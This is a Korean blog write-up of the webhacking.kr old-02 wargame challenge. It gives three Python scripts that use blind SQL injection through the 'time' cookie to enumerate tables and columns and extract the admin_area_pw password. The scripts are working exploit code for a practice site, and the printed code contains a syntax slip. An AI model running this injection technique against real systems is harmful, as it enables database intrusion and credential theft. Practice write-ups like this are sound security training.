webhacking.kr old-02 writeup

Solve Problem/Webhacking.kr 2020. 4. 21. 14:43
반응형

쿠키 값 중 time 값에 if 구문을 통해 SQLi가 가능하다.


1. 테이블명 확인

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests
 
url="https://webhacking.kr/challenge/web-02/"
flag=""
 
for i in range(1,18):
    binary=''
    for j in range(1,8):
        cookies = {'time':'if(1=(select+substr(lpad(bin(ascii(substr(group_concat(table_name),'+str(i)+',1))),7,0),'+str(j)+',1)+from+information_schema.tables+where+table_schema=database()),1,1587445410)'}
        response = requests.get(url,cookies=cookies)
 
        if('2070' in response.text):
            binary+='1'
        else:
            binary+='0'
        print(binary)
 
    b2i = int(binary, 2)  # 문자열을 2진수로 변경
    flag = flag + b2i.to_bytes((b2i.bit_length() + 7// 8,
                               'big').decode()  # to_bytes 함수를 이용하여 1자리 수의 b2i를 byte 형태로 변경 후 유니코드로 변환
    print("[+] " + flag)
 
print("[+]Final Flag : " + flag)
 
cs


결과 : admin_area_pw, log



2. 컬럼명 확인

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests
 
url="https://webhacking.kr/challenge/web-02/"
flag=""
 
for i in range(1,3):
    binary=''
    for j in range(1,8):
        cookies = {'time':'if(1=(select+substr(lpad(bin(ascii(substr(group_concat(column_name),'+str(i)+',1))),7,0),'+str(j)+',1)+from+information_schema.columns+where+table_name="admin_area_pw"),1,1587445410)'}
        response = requests.get(url,cookies=cookies)
 
        if('2070' in response.text):
            binary+='1'
        else:
            binary+='0'
        print(binary)
 
    b2i = int(binary, 2)  # 문자열을 2진수로 변경
    flag = flag + b2i.to_bytes((b2i.bit_length() + 7// 8,
                               'big').decode()  # to_bytes 함수를 이용하여 1자리 수의 b2i를 byte 형태로 변경 후 유니코드로 변환
    print("[+] " + flag)
 
print("[+]Final Flag : " + flag)
 
cs


결과 : pw


3. pw 확인

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests
 
url="https://webhacking.kr/challenge/web-02/"
flag=""
 
for i in range(1,18):
    binary=''
    for j in range(1,8):
        cookies = {'time':'if(1=(select+substr(lpad(bin(ascii(substr(pw,'+str(i)+',1))),7,0),'+str(j)+',1)+from+admin_area_pw),1,1587445410)'}
        response = requests.get(url,cookies=cookies)
 
        if('2070' in response.text):
            binary+='1'
        else:
            binary+='0'
        print(binary)
 
    b2i = int(binary, 2)  # 문자열을 2진수로 변경
    flag = flag + b2i.to_bytes((b2i.bit_length() + 7// 8,
                               'big').decode()  # to_bytes 함수를 이용하여 1자리 수의 b2i를 byte 형태로 변경 후 유니코드로 변환
    print("[+] " + flag)
 
print("[+]Final Flag : " + flag)
 
cs


반응형
저작자표시 비영리 변경금지

'Solve Problem > Webhacking.kr' 카테고리의 다른 글

webhacking.kr old-07 writeup  (0) 2020.04.21
webhacking.kr old-06 writeup  (0) 2020.04.21
webhacking.kr old-28 writeup  (0) 2020.04.17
webhacking.kr old-40 writeup  (1) 2020.04.14
webhacking.kr old-50 writeup  (0) 2020.04.14
블로그 이미지

rootable

,

공지사항

글 보관함

달력

«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

티스토리툴바